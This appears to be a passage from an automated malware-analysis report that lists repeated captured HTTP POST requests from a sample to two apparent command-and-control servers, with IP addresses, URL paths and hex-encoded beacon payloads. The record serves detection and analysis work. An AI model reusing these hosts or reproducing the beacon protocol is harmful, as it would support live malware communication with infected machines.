Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
